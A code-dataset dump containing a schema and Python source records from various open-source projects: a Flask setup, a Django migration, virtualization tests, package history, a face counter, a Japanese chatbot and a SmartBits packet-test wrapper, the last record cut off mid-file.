Dataset schema (one record per source file; each sample is split into prefix / middle / suffix spans):

| column | type | range |
|---|---|---|
| repo_name | string | 5–100 chars |
| path | string | 4–231 chars |
| language | string | 1 class |
| license | string | 15 classes |
| size | int64 | 6–947k |
| score | float64 | 0–0.34 |
| prefix | string | 0–8.16k chars |
| middle | string | 3–512 chars |
| suffix | string | 0–8.17k chars |

samuelmasuy/Concordia-Schedule-to-Gcal | app/__init__.py | Python | gpl-2.0 | 448 | 0.002232

# -*- coding: utf-8 -*-
# ===========================================================================
#
# Copyright (C) 2014 Samuel Masuy. All rights reserved.
# samuel.masuy@gmail.com
#
# ===========================================================================
from flask import Flask
# Declare app object
app = Flask(__name__)
# tell Flask where the config file is
app.config.from_object('config')
app.debug = True
from app import views
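For context, an app object created this way is typically served with Flask's built-in development server. A minimal sketch, assuming a separate entry-point module (the `run.py` name is hypothetical, not part of this sample):

```python
# run.py -- hypothetical entry point for the app built in app/__init__.py
from app import app

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000)
```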

stanford-mast/nn_dataflow | nn_dataflow/core/loop_enum.py | Python | bsd-3-clause | 705 | 0.001418

""" $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
'''
Enum for loop types.
'''
IFM = 0
OFM = 1
BAT = 2
NUM = 3
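These constants act as indices into per-loop-type sequences, with `NUM` doubling as the number of loop types. A minimal sketch of the indexing pattern (the `loop_counts` tuple is illustrative, not from the repo):

```python
from nn_dataflow.core import loop_enum as le

loop_counts = (4, 8, 16)           # counts for IFM, OFM, BAT, in enum order
assert len(loop_counts) == le.NUM  # NUM doubles as the loop-type count
bat_loops = loop_counts[le.BAT]    # -> 16
```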

MidwestCommunications/django-askmeanything | askmeanything/migrations/0004_rmpub.py | Python | mit | 4,171 | 0.010309

from south.db import db
from django.db import models
from askmeanything.models import *
class Migration:
def forwards(self, orm):
"Write your forwards migration here"
def backwards(self, orm):
"Write your backwards migration here"
models = {
'askmeanything.poll': {
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polls'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'open': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'askmeanything.response': {
'answer': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'poll': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responses'", 'to': "orm['askmeanything.Poll']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['askmeanything']

thom-at-redhat/cfme_tests | cfme/tests/infrastructure/test_esx_direct_host.py | Python | gpl-2.0 | 3,626 | 0.001103

# -*- coding: utf-8 -*-
""" Tests of managing ESX hypervisors directly. If other direct host types are
supported later, it should not be difficult to extend the parametrizer.
"""
import pytest
import random
from cfme.infrastructure.provider import VMwareProvider
from utils.conf import cfme_data, credentials
from utils.net import resolve_hostname
from utils.providers import get_crud
from utils.version import Version
from utils.wait import wait_for
def pytest_generate_tests(metafunc):
arg_names = "provider", "provider_data", "original_provider_key"
arg_values = []
arg_ids = []
for provider_key, provider in cfme_data.get("management_systems", {}).iteritems():
if provider["type"] != "virtualcenter":
continue
hosts = provider.get("hosts", [])
if not hosts:
continue
version = provider.get("version", None)
if version is None:
# No version, no test
continue
if Version(version) < "5.0":
            # Ignore versions lower than 5
            continue
host = random.choice(hosts)
creds = credentials[host["credentials"]]
ip_address = resolve_hostname(host["name"])
cred = VMwareProvider.Credential(
principal=creds["username"],
secret=creds["password"],
verify_secret=creds["password"]
)
# Mock provider data
provider_data = {}
provider_data.update(provider)
        provider_data["name"] = host["name"]
provider_data["hostname"] = host["name"]
provider_data["ipaddress"] = ip_address
provider_data["credentials"] = host["credentials"]
provider_data.pop("host_provisioning", None)
provider_data["hosts"] = [host]
provider_data["discovery_range"] = {}
provider_data["discovery_range"]["start"] = ip_address
provider_data["discovery_range"]["end"] = ip_address
host_provider = VMwareProvider(
name=host["name"],
hostname=host["name"],
ip_address=ip_address,
credentials={'default': cred},
provider_data=provider_data,
)
arg_values.append([host_provider, provider_data, provider_key])
arg_ids.append("{}/random_host".format(provider_key))
metafunc.parametrize(arg_names, arg_values, ids=arg_ids, scope="module")
@pytest.yield_fixture(scope="module")
def setup_provider(provider, original_provider_key):
original_provider = get_crud(original_provider_key)
if original_provider.exists:
# Delete original provider's hosts first
for host in original_provider.hosts:
if host.exists:
host.delete(cancel=False)
# Get rid of the original provider, it would make a mess.
original_provider.delete(cancel=False)
provider.wait_for_delete()
provider.create()
provider.refresh_provider_relationships()
try:
wait_for(
lambda: any([
provider.num_vm() > 0,
provider.num_template() > 0,
provider.num_datastore() > 0,
provider.num_host() > 0,
]), num_sec=400, delay=5)
except:
provider.delete(cancel=False)
raise
yield
for host in provider.hosts:
if host.exists:
host.delete(cancel=False)
provider.delete(cancel=False)
provider.wait_for_delete()
def test_validate(provider, setup_provider, provider_data):
"""Since the provider (host) gets added in the fixture, nothing special has to happen here."""
provider.validate(db=False)

hknyldz/pisitools | pisilinux/pisilinux/db/historydb.py | Python | gpl-3.0 | 4,426 | 0.004293

# -*- coding: utf-8 -*-
#
# Copyright (C) 2008, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import os
import pisilinux.context as ctx
import pisilinux.db.lazydb as lazydb
import pisilinux.history
import pisilinux.util  # used by save_config below
class HistoryDB(lazydb.LazyDB):
def init(self):
self.__logs = self.__generate_history()
self.history = pisilinux.history.History()
def __generate_history(self):
logs = [x for x in os.listdir(ctx.config.history_dir()) if x.endswith(".xml")]
logs.sort(lambda x,y:int(x.split("_")[0]) - int(y.split("_")[0]))
logs.reverse()
return logs
def create_history(self, operation):
self.history.create(operation)
def add_and_update(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
self.add_package(pkgBefore, pkgAfter, operation, otype)
self.update_history()
def add_package(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
self.history.add(pkgBefore, pkgAfter, operation, otype)
def load_config(self, operation, package):
config_dir = os.path.join(ctx.config.history_dir(), "%03d" % operation, package)
if os.path.exists(config_dir):
import distutils.dir_util as dir_util
dir_util.copy_tree(config_dir, "/")
    def save_config(self, package, config_file):
        hist_dir = os.path.join(ctx.config.history_dir(), self.history.operation.no, package)
if os.path.isdir(config_file):
os.makedirs(os.path.join(hist_dir, config_file))
return
destdir = os.path.join(hist_dir, config_file[1:])
pisilinux.util.copy_file_stat(config_file, destdir);
def update_repo(self, repo, uri, operation = None):
self.history.update_repo(repo, uri, operation)
self.update_history()
def update_history(self):
self.history.update()
def get_operation(self, operation):
for log in self.__logs:
if log.startswith("%03d_" % operation):
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
return hist.operation
return None
def get_package_config_files(self, operation, package):
package_path = os.path.join(ctx.config.history_dir(), "%03d/%s" % (operation, package))
if not os.path.exists(package_path):
return None
configs = []
for root, dirs, files in os.walk(package_path):
for f in files:
configs.append(("%s/%s" % (root, f)))
return configs
def get_config_files(self, operation):
config_path = os.path.join(ctx.config.history_dir(), "%03d" % operation)
if not os.path.exists(config_path):
return None
allconfigs = {}
packages = os.listdir(config_path)
for package in packages:
allconfigs[package] = self.get_package_config_files(operation, package)
return allconfigs
def get_till_operation(self, operation):
if not [x for x in self.__logs if x.startswith("%03d_" % operation)]:
return
for log in self.__logs:
if log.startswith("%03d_" % operation):
return
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
yield hist.operation
def get_last(self, count=0):
count = count or len(self.__logs)
for log in self.__logs[:count]:
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
yield hist.operation
def get_last_repo_update(self, last=1):
repoupdates = [l for l in self.__logs if l.endswith("repoupdate.xml")]
repoupdates.reverse()
if not len(repoupdates) >= 2:
return None
if last != 1 and len(repoupdates) <= last:
return None
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), repoupdates[-last]))
return hist.operation.date

kiyukuta/chainer | chainer/links/connection/parameter.py | Python | mit | 1,222 | 0

from chainer import cuda
from chainer.functions.math import identity
from chainer import link
class Parameter(link.Link):
"""Link that just holds a parameter and returns it.
.. deprecated:: v1.5
The parameters are stored as variables as of v1.5. Use them directly
instead.
Args:
array: Initial parameter array.
Attributes:
W (~chainer.Variable): Parameter variable.
"""
    def __init__(self, array):
super(Parameter, self).__init__()
self.add_param('W', array.shape, dtype=array.dtype)
self.W.data = array
if isinstance(array, cuda.ndarray):
self.to_gpu(cuda.get_device_from_array(array))
    def __call__(self, volatile='off'):
"""Returns the parameter variable.
Args:
volatile (~chainer.Flag): The volatility of the returned variable.
Returns:
~chainer.Variable: A copy of the parameter variable with given
volatility.
"""
# The first identity creates a copy of W, and the second identity cuts
# the edge if volatility is ON
W = identity.identity(self.W)
W.volatile = volatile
return identity.identity(W)
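A quick usage sketch of this deprecated link under the chainer v1.x API shown above, assuming NumPy is available:

```python
import numpy as np

# Wrap an array in the (deprecated) Parameter link, then fetch it back
# as a Variable by calling the link.
p = Parameter(np.zeros((2, 3), dtype=np.float32))
W = p()              # copy of the parameter variable, volatile='off'
print(W.data.shape)  # (2, 3)
```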

sampadsaha5/sympy | examples/beginner/basic.py | Python | bsd-3-clause | 336 | 0.008929

#!/usr/bin/env python
"""Basic example
Demonstrates how to create symbols and print some algebra operations.
"""
from sympy import Symbol, pprint
def main():
a = Symbol('a')
b = Symbol('b')
c = Symbol('c')
e = ( a*b*b + 2*b*a*b )**c
print('')
pprint(e)
print('')
if __name__ == "__main__":
main()

kvasnyj/face_counter | counter.py | Python | gpl-3.0 | 2,444 | 0.003273

import cv2
import numpy as np
import datetime as dt
# constant
faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
OPENCV_METHODS = {
"Correlation": 0,
"Chi-Squared": 1,
"Intersection": 2,
"Hellinger": 3}
hist_limit = 0.6
ttl = 1 * 60
q_limit = 3
# init variables
total_count = 0
prev_count = 0
total_delta = 0
stm = {}
q = []
term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
video_capture = cv2.VideoCapture(0)
while True:
for t in list(stm): # short term memory
if (dt.datetime.now() - t).seconds > ttl:
stm.pop(t, None)
# Capture frame-by-frame
ret, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.2,
minNeighbors=5,
minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE
)
count = len(faces)
if len(q) >= q_limit: del q[0]
q.append(count)
isSame = True
for c in q: # Protect from fluctuation
if c != count: isSame = False
if isSame is False: continue
max_hist = 0
total_delta = 0
for (x, y, w, h) in faces:
# Draw a rectangle around the faces
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
if count == prev_count: continue
# set up the ROI
face = frame[y: y + h, x: x + w]
hsv_roi = cv2.cvtColor(face, cv2.COLOR_BGR2HSV)
        # Hue-channel histogram; use the HSV ROI (the original passed the BGR
        # image despite computing hsv_roi, while the bounds are HSV ranges)
        mask = cv2.inRange(hsv_roi, np.array((0., 60., 32.)), np.array((180., 255., 255.)))
        face_hist = cv2.calcHist([hsv_roi], [0], mask, [180], [0, 180])
cv2.normalize(face_hist, face_hist, 0, 255, cv2.NORM_MINMAX)
isFound = False
for t in stm:
hist_compare = cv2.compareHist(stm[t], face_hist, OPENCV_METHODS["Correlation"])
if hist_compare > max_hist: max_hist = hist_compare
if hist_compare >= hist_limit: isFound = True
if (len(stm) == 0) or (isFound is False and max_hist > 0):
total_delta += 1
stm[dt.datetime.now()] = face_hist
if prev_count != count:
total_count += total_delta
print("", count, " > ", total_count)
prev_count = count
# Display the resulting frame
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()

BlueHoleUEC/BlueHoleUEC | ans_main_t3.py | Python | mit | 21,255 | 0.046417

#!/usr/bin/env python
# coding: utf-8
# Python version: 3.5.0
# (Prerequisite) MeCab must be callable from Python
import sys
import MeCab
import re
import pandas
from PIL import Image
# ---- imports of external project files ----
import python_mecab
import get_nlc
import get_day_time
import record
import ans_main_t3
import add_q_main
import main_t3
from k3.main import K3
# Format of the "results" received from the k3 system
'''
{'all_and': 1,
'data': {'created_at': None,
'how_time': '10時間',
'id': 7,
'title': '剣道部のフライドチキン',
'updated_at': None,
'what': '剣道部のフライドチキン',
'when_day': '17',
'when_time': '10',
'where': '広場',
'who': '剣道部'},
'reliability': 4.0},
'''
# Create a K3 system instance
k3 = K3()
# Record inputs and outputs
rfs = record.record_for_s
rfu = record.record_for_u
# Response when exactly one answer candidate is found
def one_ans(category_ans,result,count_row_start):
reliability = result[0]['reliability']
if reliability < 1:
rfs('>条件に合致するデータは見つかりませんでしたが、似たデータが一つ見つかりました。')
else:
rfs('>回答候補が一つ見つかりました。')
    # Take the dict out of the result list
result = result[0]['data']
if category_ans == 'what':
print('----------')
print('category is what')
ans_what = result['what']
ans_title = result['title']
ans_when_time = result['when_time']
rfs(">" + ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
print('----------')
elif category_ans == 'when':
print('----------')
print('category is when')
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
rfs('>title:' + str(ans_title))
rfs(">" +ans_when_day + '日の' + ans_when_time + '開始です。')
print('----------')
elif category_ans == 'who':
print('----------')
print('category is who')
ans_title = result['title']
ans_who = result['who']
rfs('>title:' + str(ans_title))
rfs(">" +ans_who + 'です。')
print('----------')
elif category_ans == 'where':
print('----------')
print('category is where')
ans_title = result['title']
ans_where = result['where']
rfs('>title:' + str(ans_title))
rfs('>場所は'+ ans_where + 'です。')
print('----------')
elif category_ans == 'how_time':
print('----------')
print('category is how_time')
ans_how = result['how_time']
ans_title = result['title']
rfs('>title:' + str(ans_title))
rfs(">" +ans_how + 'です。')
print('----------')
else:
print('>category is why or how')
rfs('>スタッフの方に引き継ぎます。')
        # Finish
        record.record_A('----- conversation end -----')
        # Show the conversation history
df = pandas.read_csv('conversation_log.csv', header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
if reliability < 1:
if result['parent_id'] != None:
parent = k3.get_parent(result['parent_id'])
if parent['image']:
rfs('>参考に親データ画像を表示します')
#画像の読み込み
im = Image.open(parent['image'])
im.show()
# List and display multiple answer candidates from a partial-condition search
# Filter the table by confidence
def some_ans(category_ans,results,borderline,count_row_start):
rfs('>いくつかの回答候補が見つかりました。')
    # Track answers with a counter
count = 0
for result in results:
        # Display only entries up to the preset reliability cutoff
if borderline >= count:
print('----------')
if category_ans == 'what':
#print('category is what')
result = result['data']
ans_what = result['what']
ans_title = result['title']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs(ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
rfs('開催場所:' + ans_where)
elif category_ans == 'when':
#print('category is when')
result = result['data']
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(str(ans_when_day) + '日の' + str(ans_when_time) + '開始です。')
rfs('開催場所:' + ans_where)
elif category_ans == 'who':
#print('category is who')
result = result['data']
ans_title = result['title']
ans_name = result['who']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_name + 'さん。')
elif category_ans == 'where':
#print('category is where')
result = result['data']
ans_title = result['title']
ans_where = result['where']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_where + 'で行われます。')
elif category_ans == 'how_time':
#print('category is how_time')
result = result['data']
ans_title = result['title']
ans_how_time = result['how_time']
print('[' + str(count) + ']')
rfs(ans_title + ':' + ans_how_time + '時間')
else:
print('category is why or how')
rfs('スタッフの方に引き継ぎます。')
                # Finish
                record.record_A('----- conversation end -----')
                # Show the conversation history
df = pandas.read_csv('conversation_log.csv', header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
        # Increment the answer counter
count += 1
print('----------')
# When a full-condition search returns multiple answers,
# do not filter by reliability
def some_ans_all(category_ans,results,count_row_start):
rfs('>いくつかの回答候補が見つかりました。')
    # Track answers with a counter
count = 0
for result in results:
if result['all_and'] == 1:
print('----------')
if category_ans == 'what':
#print('category is what')
result = result['data']
ans_what = result['what']
ans_title = result['title']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs(ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
rfs('開催場所:' + ans_where)
elif category_ans == 'when':
#print('category is when')
result = result['data']
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(str(ans_when_day) + '日の' + str(ans_when_time) + '開始です。')
                rfs('開催場所:' + ans_where)
elif category_ans == 'who':
#print('category is who')
result = result['data']
ans_title = result['title']
ans_name = result['who']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_name + 'さん。')
elif category_ans == 'where':
#print('category is where')
result = result['data']
ans_title = result['title']
ans_where = result['where']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_where + 'で行われます。')
elif category_ans == 'how_time':
#print('category is how_time')
result = result['data']
ans_title = result['title']
ans_how_time = result['how_time']
print('[' + str(count) + ']')
rfs(ans_title + ':' + ans_how_time + '時間')
else:
print('category is why or how')
rfs('スタッフへ引き継ぎます。')
                # Finish
                record.record_A('----- conversation end -----')
                # Show the conversation history
                df = pandas.read_csv('conversation_log.csv', header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
        # Increment the answer counter
count += 1
print('----------')
# Query the information-retrieval component (k3) to search the DB
# Matching tuples are returned as a list
def look_k3(data):
k3.set_params(data)
return k3.search()
# Ask the user whether the desired information was found;
# if not, start over from the beginning
# yes_or_no_one: the single-answer case
def yes_or_no_one(result,count_row_start):
if result['image'] != None:
rfs('>詳細を表示します')
im = Image.open(result['image'])
im.show()
rfs('>欲しい情報でしたか?(yes/no)')
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
result_more = result
ans_main_t3.more_question(result_more)
elif u_ans == 'no':
rfs('>スタッフへ引き継ぐために履歴を表示します。')
record.record_A('----- conversation end -----')
        # Show the conversation history
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
# Ask the user whether the desired information was found;
# if not, start over from the beginning
# yes_or_no_some: the multiple-answer case
def yes_or_no_some(results,list_num,count_row_start):
rfs('>欲しい情報はありましたか?(yes/no)')
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
        # the information the user wanted

willemneal/Docky | lib/pylint/test/functional/import_error.py | Python | mit | 419 | 0.004773

""" Test that import errors are detected. """
# pylint: disable=invalid-name, unused-import, no-absolute-import
import totally_missing # [import-error]
try:
import maybe_missing
except ImportError:
maybe_missing = None
try:
import maybe_missing_1
except (ImportError, SyntaxError):
maybe_missing_1 = None
try:
import maybe_missing_2 # [import-error]
except ValueError:
    maybe_missing_2 = None

MediaKraken/MediaKraken_Deployment | source/common/common_metadata_tv_intro.py | Python | gpl-3.0 | 1,725 | 0.001159

"""
Copyright (C) 2016 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
from bs4 import BeautifulSoup
from common import common_logging_elasticsearch_httpx
from . import common_network
from . import common_string
# http://www.tv-intros.com
def com_tvintro_download(media_name):
"""
Try to grab intro from tvintro
"""
    # TODO doesn't match the tvintro........base from theme
data = BeautifulSoup(common_network.mk_network_fetch_from_url(
'http://www.tv-intros.com/' + media_name[0].upper() + '/'
+ common_string.com_string_title(media_name).replace(' ', '_')
+ ".html", None)).find(id="download_song")
if data is not None:
common_logging_elasticsearch_httpx.com_es_httpx_post(message_type='info',
message_text={'href': data['href']})
common_network.mk_network_fetch_from_url('http://www.tv-intros.com'
+ data['href'], 'theme.mp3')
return True # success
return False # no match

abawchen/leetcode | tests/012.py | Python | mit | 1,527 | 0.003929

import unittest
import sys
sys.path.append('./')
solutions = __import__('solutions.012_integer_to_roman', fromlist='*')
class Test012(unittest.TestCase):
def test_intToRoman(self):
s = solutions.Solution()
self.assertEqual(s.intToRoman(1), "I")
self.assertEqual(s.intToRoman(2), "II")
self.assertEqual(s.intToRoman(3), "III")
self.assertEqual(s.intToRoman(4), "IV")
self.assertEqual(s.intToRoman(5), "V")
self.assertEqual(s.intToRoman(6), "VI")
self.assertEqual(s.intToRoman(7), "VII")
self.assertEqual(s.intToRoman(8), "VIII")
self.assertEqual(s.intToRoman(9), "IX")
self.assertEqual(s.intToRoman(10), "X")
self.assertEqual(s.intToRoman(28), "XXVIII")
self.assertEqual(s.intToRoman(29), "XXIX")
self.assertEqual(s.intToRoman(40), "XL")
self.assertEqual(s.intToRoman(41), "XLI")
        self.assertEqual(s.intToRoman(89), "LXXXIX")
self.assertEqual(s.intToRoman(98), "XCVIII")
        self.assertEqual(s.intToRoman(99), "XCIX")
self.assertEqual(s.intToRoman(316), "CCCXVI")
self.assertEqual(s.intToRoman(400), "CD")
self.assertEqual(s.intToRoman(499), "CDXCIX")
self.assertEqual(s.intToRoman(894), "DCCCXCIV")
self.assertEqual(s.intToRoman(1499), "MCDXCIX")
self.assertEqual(s.intToRoman(3999), "MMMCMXCIX")
for i in xrange(1, 4000):
s.intToRoman(i)
if __name__ == '__main__':
unittest.main()
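The `solutions.012_integer_to_roman` module itself is not part of this sample; a typical greedy implementation consistent with these assertions looks like:

```python
class Solution(object):
    # Greedy conversion: repeatedly emit the largest symbol that fits.
    _PAIRS = [
        (1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
        (100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
        (10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I'),
    ]

    def intToRoman(self, num):
        out = []
        for value, symbol in self._PAIRS:
            while num >= value:
                out.append(symbol)
                num -= value
        return ''.join(out)
```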

kdart/pycopia | QA/pycopia/smartbits/smartlib.py | Python | apache-2.0 | 8,204 | 0.005241

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is a high-level object interface to the Smartbits test system. It
also imports all of the low-level API calls. These low-level wrapper
classes are automatically generated by SWIG. You must first install the
smartbits module in order for this to work. The SWIG program wraps the
smartlib C API and this smartbits package makes it available to the Python
programmer. This module also defines some utility functions.
"""
from pycopia.smartbits.SMARTBITS import *
from pycopia.smartbits.smartbits_struct import *
from pycopia.smartbits.smartbits_func import *
SmartlibError = smartbits_funcc.SmartlibError
class SmartbitsError(SmartlibError):
pass
# you can subclass smartlib structures and add methods!
class HTCount(HTCountStructure):
pass
# some helpful functions follow, borrowed from Smartlib sample C code.
def linkToSmartBits(ipaddr=None, port=16385):
# ETGetLinkStatus will be positive if we're linked
try:
st = ETGetLinkStatus()
except SmartlibError, err:
if not ipaddr:
ipaddr = raw_input ("Enter IP address of SmartBits chassis ==> ")
try:
NSSocketLink(ipaddr,port,RESERVE_NONE)
except SmartlibError, err:
print_error_desc(err)
raise SmartbitsError, err[0]
def resetCard(hub, slot, port):
"""
HTResetPort resets card to power on defaults
"""
HTResetPort(RESET_FULL, hub, slot, port)
def setFill(hub, slot, port, fill_len):
"""
setFill(hub, slot, port, fill_len)
    Sets the background fill pattern. The first 6 bytes are set to 0xFF
to create a broadcast packet. The rest of the packet is filled with 0xAA.
"""
fillData = "\xFF" * 6 + "\xAA" * fill_len
HTFillPattern( len(fillData), fillData, hub, slot, port)
def setVFD1(h1, s1, p1):
"""
Sets up VFD1 to overwrite the source MAC area of the packet
VFD 1 and 2 work like counters, will overwrite 1 to 6 bytes
and can be set static, increment or decrement.
Since we have set the fill to have FF FF FF FF FF FF in the first
six bytes and this VFD has an offset of 48 bits it will overwrite the
next six bytes with 66 55 44 33 22 11
"""
vfdstruct = HTVFDStructure()
# MAC will increment with each successive packet
vfdstruct.Configuration = HVFD_INCR
# will overwrite 6 bytes
vfdstruct.Range = 6
# 48 bits (6 bytes) after preamble - SOURCE MAC
vfdstruct.Offset = 48
    # order is 0 = LSB - will produce a MAC address 66 55 44 33 22 11
# XXX current interface uses pointers
vfdData = ptrcreate("int",0,6)
ptrset(vfdData, 0x11, 0)
ptrset(vfdData, 0x22, 1)
ptrset(vfdData, 0x33, 2)
ptrset(vfdData, 0x44, 3)
ptrset(vfdData, 0x55, 4)
ptrset(vfdData, 0x66, 5)
    # Associate the data with the VFD structure
vfdstruct.Data = vfdData
# will increment 5 times then repeat LSB of Source MAC will
# follow 11 12 13 14 15 11 12 pattern
vfdstruct.DataCount = 5
# send to config card
HTVFD( HVFD_1, vfdstruct, h1, s1, p1)
ptrfree(vfdData)
def setTrigger(h1, s1, p1):
"""
setTrigger
Sets a trigger to match the base source MAC address. Since we have a
cycle count of five on the VFD1 we are triggering on, our trigger will fire
every fifth packet.
"""
MyTrigger = HTTriggerStructure()
# start 48 bits after preamble (SOURCE MAC)
MyTrigger.Offset = 48
# trigger pattern is 6 bytes long
MyTrigger.Range = 6
# data to match is 66 55 44 33 22 11
# XXX future interface, use typemaps to allow python list assignment to
    # member arrays.
MyTrigger.Pattern = [0x11, 0x22, 0x33, 0x44, 0x55, 0x66]
# send config to card
HTTrigger( HTTRIGGER_1, HTTRIGGER_ON, MyTrigger, h1, s1, p1)
def clearCounters(h1, s1, p1):
"""
clearCounters
zero out the counters on the target Hub Slot Port
"""
HTClearPort( h1, s1, p1)
def sendPackets(h1, s1, p1):
"""
sendPackets
